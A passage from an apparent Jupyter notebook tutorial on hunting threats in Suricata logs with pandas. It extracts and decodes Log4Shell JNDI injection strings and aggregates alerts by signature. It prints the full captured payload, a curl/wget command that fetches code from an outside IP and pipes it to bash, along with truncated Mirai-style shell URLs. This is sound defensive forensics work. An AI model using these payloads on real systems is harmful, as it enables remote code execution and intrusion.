array(['/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}'],
      dtype=object)

Likewise, we can verify that `http.http_refer` is actually the same script with additional bypass to sanitation. Connection parameters are the same, and so is the base64 encoded payload.

In [57]:
(
    DF_LOG4J["http.http_refer"]
    .dropna()
    .unique()
)

array(['${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}'],
      dtype=object)

#### Extract and decode the payload

Most interesting part of this injection is the base64 encoded string. Base64 is a encoding method to convert binary data into a text, thus enabling transfer over channels that only support text. Actually, the value after `Base64/` holds another script. It is encoded to avoid script syntax breaking the HTTP request. It also hides the true nature of the malicious command from quick view. 

Let's assume we need to extract these payloads for forensics or for automating a hunting case. Firstly we need to extract the base64 payload. Quick solution is to define a extraction function that uses regular expression match groups. A base64 is text value comprising on upper or lowercase characters, numbers, and might end with equal signs.

In [58]:
import numpy as np
import re

In [59]:
PATTERN = re.compile(r"Base64/([A-Za-z0-9]+={,2})")

In [60]:
def extract_base64(x: str):
    if pd.isna(x):
        return np.NaN
    match = re.search(PATTERN, x)
    if match:
        return match.group(1)
    return np.NaN

This code will not be fast. Both Python and regular expressions are notorious for being slow. But it's good enough, and any good SoC engineer knows that sometimes a simple trick can save the day. Function can be passed directly into pandas `apply` method, which would in turn execute it for every value on required column. As we've already seen, a value could be missing or simply not contain interesting values. Our function would return numpy `NaN` in those cases, as that's how pandas usually denotes missing values. Note that we need to use `pd.isna` or `pd.isnull` functions since `NaN` is a special floating point value that has to be matched correctly. Python programmers that are used to relying on `is None` checks might get a bad surprise otherwise.

Pandas `apply` method accepts function as argument. Here we call in on `http.url` column. Row value is implicitly passed as the argument to that function, for every value. Think of it as a more concise `for loop`.

In [61]:
DF["base64_payload"] = DF["http.url"].apply(extract_base64)

Then we can build a dataframe comprising only of extracted base64 values.

In [62]:
DF_REPORT = DF.loc[pd.notna(DF["base64_payload"])].copy()

In [63]:
DF_REPORT["base64_payload"]

1723    KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTguNz...
1724    KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTguNz...
1732    KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTguNz...
3222    KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTguNz...
3228    KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTguNz...
3232    KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTguNz...
Name: base64_payload, dtype: object

Finally, we can `apply` base64 decode function over the extracted payload, revealing the actual script inside.

In [64]:
import base64

In [65]:
DF_REPORT["decoded_payload"] = DF_REPORT["base64_payload"].apply(base64.b64decode)
DF_REPORT["decoded_payload"] = DF_REPORT["decoded_payload"].apply(lambda x: x.decode("utf-8") if pd.notna(x) else np.NaN)

In [66]:
DEFAULT_COLWIDTH = pd.get_option('display.max_colwidth')
pd.set_option('display.max_colwidth', None)

In [67]:
DF_REPORT[["flow_id", "decoded_payload"]]

,flow_id,decoded_payload
1723,42135186956994,(curl -s 195.54.160.149:5874/198.71.247.91:80||wget -q -O- 195.54.160.149:5874/198.71.247.91:80)|bash
1724,42135186956994,(curl -s 195.54.160.149:5874/198.71.247.91:80||wget -q -O- 195.54.160.149:5874/198.71.247.91:80)|bash
1732,42135186956994,(curl -s 195.54.160.149:5874/198.71.247.91:80||wget -q -O- 195.54.160.149:5874/198.71.247.91:80)|bash
3222,518356397128850,(curl -s 195.54.160.149:5874/198.71.247.91:80||wget -q -O- 195.54.160.149:5874/198.71.247.91:80)|bash
3228,518356397128850,(curl -s 195.54.160.149:5874/198.71.247.91:80||wget -q -O- 195.54.160.149:5874/198.71.247.91:80)|bash
3232,518356397128850,(curl -s 195.54.160.149:5874/198.71.247.91:80||wget -q -O- 195.54.160.149:5874/198.71.247.91:80)|bash


In [68]:
pd.set_option('display.max_colwidth', DEFAULT_COLWIDTH)

Pandas dataframes can easily be exported to various formats. Quite handy for incident reports.

In [69]:
(
    DF_REPORT[[
        "event_type",
        "src_ip", 
        "dest_ip", 
        "flow_id", 
        "http.hostname", 
        "http.url", 
        "base64_payload", 
        "decoded_payload"
    ]]
    .to_csv("./report.csv")
)

In [70]:
!ls -lah *.csv

-rw-r--r-- 1 jovyan users 3.1K Feb 23 09:05 report.csv


### Aggregate

Note that at the end of the exploration, we basically only had a single unique payload to decode. Sure, the example was trivial, but *uniqueness* is surprisingly effective hunting method even on big datasets. Previously, the reader might have observed pandas `unique` method, but we can do better. *Aggregations* over data groupings can reveal great insights.

Suppose we want to explore not only the log4j exploitation URL, but all URL-s associated with HTTP alerts. One could simply group data by unique alert signatures by using pandas `groupby` method. These groupings are not usable by themselves, but need to be passed into aggregation method.

Cool thing is, pandas supports doing many aggregations at once. User can call upon a number of existing aggregations, or even define custom functions. For example, getting largest and smallest values using `max` and `min` functions, presenting `unique` values, counting events per grouping, number of unique values for a particular field, etc.

In [71]:
DF_AGG_HTTP = (
    DF
    .loc[DF["alert.category"] != "Generic Protocol Command Decode"]
    .loc[pd.notna(DF["http.url"])]
    .groupby("alert.signature")
    .agg({
        "timestamp": ["min", "max"],
        "http.url": ["unique", "count", "nunique"],
        "http.hostname": ["unique", "nunique"],
    })
)
DF_AGG_HTTP

timestamp  \
                                                                                min   
alert.signature                                                                       
ET SCAN JAWS Webserver Unauthenticated Shell Co... 2022-01-01 19:05:52.130715+00:00   
ET SCAN Mirai Variant User-Agent (Inbound)         2022-01-01 19:05:52.130715+00:00   
ET SCAN Zmap User-Agent (Inbound)                  2022-01-01 06:15:44.677931+00:00   
TGI HUNT Graves Accent (backtick) in HTTP Header   2022-01-01 00:00:13.076985+00:00   
TGI HUNT HTTP POST to wp-.* without referer        2022-01-02 23:52:24.270163+00:00   
TGI HUNT PHP Magic Bytes in HTTP Request           2022-01-03 06:19:38.281297+00:00   
TGI HUNT log4j with Base64                         2022-01-01 19:55:04.810648+00:00   

                                                                                     \
                                                                                max   
alert.signature                                                                       
ET SCAN JAWS Webserver Unauthenticated Shell Co... 2022-01-03 15:56:46.593537+00:00   
ET SCAN Mirai Variant User-Agent (Inbound)         2022-01-03 15:56:46.593537+00:00   
ET SCAN Zmap User-Agent (Inbound)                  2022-01-03 18:03:03.885337+00:00   
TGI HUNT Graves Accent (backtick) in HTTP Header   2022-01-01 00:00:13.076985+00:00   
TGI HUNT HTTP POST to wp-.* without referer        2022-01-02 23:52:24.270163+00:00   
TGI HUNT PHP Magic Bytes in HTTP Request           2022-01-03 06:19:38.281297+00:00   
TGI HUNT log4j with Base64                         2022-01-02 17:00:02.205062+00:00   

                                                                                             http.url  \
                                                                                               unique   
alert.signature                                                                                         
ET SCAN JAWS Webserver Unauthenticated Shell Co...  [/shell?cd+/tmp;rm+-rf+*;wget+, /shell?cd+/tmp...   
ET SCAN Mirai Variant User-Agent (Inbound)          [/shell?cd+/tmp;rm+-rf+*;wget+, /GponForm/diag...   
ET SCAN Zmap User-Agent (Inbound)                   [/, /hudson, /actuator/health, /portal/redlion...   
TGI HUNT Graves Accent (backtick) in HTTP Header                                            [/HNAP1/]   
TGI HUNT HTTP POST to wp-.* without referer                          [/wp-includes/css/wp-config.php]   
TGI HUNT PHP Magic Bytes in HTTP Request            [/vendor/phpunit/phpunit/src/Util/PHP/eval-std...   
TGI HUNT log4j with Base64                          [/?x=${jndi:ldap://195.54.160.149:12344/Basic/...   

                                                                  \
                                                   count nunique   
alert.signature                                                    
ET SCAN JAWS Webserver Unauthenticated Shell Co...     3       2   
ET SCAN Mirai Variant User-Agent (Inbound)             5       3   
ET SCAN Zmap User-Agent (Inbound)                     10       6   
TGI HUNT Graves Accent (backtick) in HTTP Header       2       1   
TGI HUNT HTTP POST to wp-.* without referer            1       1   
TGI HUNT PHP Magic Bytes in HTTP Request               1       1   
TGI HUNT log4j with Base64                             2       1   

                                                                 http.hostname  \
                                                                        unique   
alert.signature                                                                  
ET SCAN JAWS Webserver Unauthenticated Shell Co...  [127.0.0.1, 198.71.247.91]   
ET SCAN Mirai Variant User-Agent (Inbound)          [127.0.0.1, 198.71.247.91]   
ET SCAN Zmap User-Agent (Inbound)                              [198.71.247.91]   
TGI HUNT Graves Accent (backtick) in HTTP Header               [198.71.247.91]   
TGI HUNT HTTP POST to wp-.

We basically got the same information without having to manually dig inside the data. We could even apply the extraction functions on the aggregations instead of raw values, drastically reducing the processing overhead. Accessing aggregate columns might seem a bit strange at first, but actually works exactly as it would over any dataframe. Two differences to keep in mind are:
* keys are tuples, rather than values. This might not be apparent when looking at the dataframe display, but can be verified using `DF.columns.values`;
* `unique` aggregation creates a list of values, so `apply` must expect a list or the list must be expanded to separate rows using `explode` method. Note that `explode` is quite aptly named, and can easily cause problems;

In [72]:
SERIES_BASE64 = DF_AGG_HTTP[('http.url', 'unique')].apply(lambda x: [extract_base64(v) for v in x])
SERIES_BASE64

alert.signature
ET SCAN JAWS Webserver Unauthenticated Shell Command Execution                                           [nan, nan]
ET SCAN Mirai Variant User-Agent (Inbound)                                                          [nan, nan, nan]
ET SCAN Zmap User-Agent (Inbound)                                                    [nan, nan, nan, nan, nan, nan]
TGI HUNT Graves Accent (backtick) in HTTP Header                                                              [nan]
TGI HUNT HTTP POST to wp-.* without referer                                                                   [nan]
TGI HUNT PHP Magic Bytes in HTTP Request                                                                      [nan]
TGI HUNT log4j with Base64                                        [KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTguN...
Name: (http.url, unique), dtype: object

Explore method would create a new row for each entry in the list. Even if entry is a missing value. This can be convenient, but will consume a lot of memory with bigger dataframes.

In [73]:
DF_AGG_HTTP[('http.url', 'unique')].explode().apply(extract_base64)

alert.signature
ET SCAN JAWS Webserver Unauthenticated Shell Command Execution                                                  NaN
ET SCAN JAWS Webserver Unauthenticated Shell Command Execution                                                  NaN
ET SCAN Mirai Variant User-Agent (Inbound)                                                                      NaN
ET SCAN Mirai Variant User-Agent (Inbound)                                                                      NaN
ET SCAN Mirai Variant User-Agent (Inbound)                                                                      NaN
ET SCAN Zmap User-Agent (Inbound)                                                                               NaN
ET SCAN Zmap User-Agent (Inbound)                                                                               NaN
ET SCAN Zmap User-Agent (Inbound)                                                                               NaN
ET SCAN Zmap User-Agent (Inbound)                       

We could also write a apply function that assumes list input. Result is smaller dataframe, but we cannot use native pandas filtering or transformation methods on the resulting list.

In [74]:
DF_AGG_HTTP["extraction"] = SERIES_BASE64
DF_AGG_HTTP["decode"] = SERIES_BASE64.apply(lambda x: [base64.b64decode(v).decode("UTF-8")
                                                       for v in x if pd.notna(v)])
DF_AGG_HTTP

timestamp  \
                                                                                min   
alert.signature                                                                       
ET SCAN JAWS Webserver Unauthenticated Shell Co... 2022-01-01 19:05:52.130715+00:00   
ET SCAN Mirai Variant User-Agent (Inbound)         2022-01-01 19:05:52.130715+00:00   
ET SCAN Zmap User-Agent (Inbound)                  2022-01-01 06:15:44.677931+00:00   
TGI HUNT Graves Accent (backtick) in HTTP Header   2022-01-01 00:00:13.076985+00:00   
TGI HUNT HTTP POST to wp-.* without referer        2022-01-02 23:52:24.270163+00:00   
TGI HUNT PHP Magic Bytes in HTTP Request           2022-01-03 06:19:38.281297+00:00   
TGI HUNT log4j with Base64                         2022-01-01 19:55:04.810648+00:00   

                                                                                     \
                                                                                max   
alert.signature                                                                       
ET SCAN JAWS Webserver Unauthenticated Shell Co... 2022-01-03 15:56:46.593537+00:00   
ET SCAN Mirai Variant User-Agent (Inbound)         2022-01-03 15:56:46.593537+00:00   
ET SCAN Zmap User-Agent (Inbound)                  2022-01-03 18:03:03.885337+00:00   
TGI HUNT Graves Accent (backtick) in HTTP Header   2022-01-01 00:00:13.076985+00:00   
TGI HUNT HTTP POST to wp-.* without referer        2022-01-02 23:52:24.270163+00:00   
TGI HUNT PHP Magic Bytes in HTTP Request           2022-01-03 06:19:38.281297+00:00   
TGI HUNT log4j with Base64                         2022-01-02 17:00:02.205062+00:00   

                                                                                             http.url  \
                                                                                               unique   
alert.signature                                                                                         
ET SCAN JAWS Webserver Unauthenticated Shell Co...  [/shell?cd+/tmp;rm+-rf+*;wget+, /shell?cd+/tmp...   
ET SCAN Mirai Variant User-Agent (Inbound)          [/shell?cd+/tmp;rm+-rf+*;wget+, /GponForm/diag...   
ET SCAN Zmap User-Agent (Inbound)                   [/, /hudson, /actuator/health, /portal/redlion...   
TGI HUNT Graves Accent (backtick) in HTTP Header                                            [/HNAP1/]   
TGI HUNT HTTP POST to wp-.* without referer                          [/wp-includes/css/wp-config.php]   
TGI HUNT PHP Magic Bytes in HTTP Request            [/vendor/phpunit/phpunit/src/Util/PHP/eval-std...   
TGI HUNT log4j with Base64                          [/?x=${jndi:ldap://195.54.160.149:12344/Basic/...   

                                                                  \
                                                   count nunique   
alert.signature                                                    
ET SCAN JAWS Webserver Unauthenticated Shell Co...     3       2   
ET SCAN Mirai Variant User-Agent (Inbound)             5       3   
ET SCAN Zmap User-Agent (Inbound)                     10       6   
TGI HUNT Graves Accent (backtick) in HTTP Header       2       1   
TGI HUNT HTTP POST to wp-.* without referer            1       1   
TGI HUNT PHP Magic Bytes in HTTP Request               1       1   
TGI HUNT log4j with Base64                             2       1   

                                                                 http.hostname  \
                                                                        unique   
alert.signature                                                                  
ET SCAN JAWS Webserver Unauthenticated Shell Co...  [127.0.0.1, 198.71.247.91]   
ET SCAN Mirai Variant User-Agent (Inbound)          [127.0.0.1, 198.71.247.91]   
ET SCAN Zmap User-Agent (Inbound)                              [198.71.247.91]   
TGI HUNT Graves Accent (backtick) in HTTP Header               [198.71.247.91]   
TGI HUNT HTTP POST to wp-.

This allows us to achieve the same result in a lot more concise manner. Aggregating the data and simply looking into unique values basically did the pivoting for us.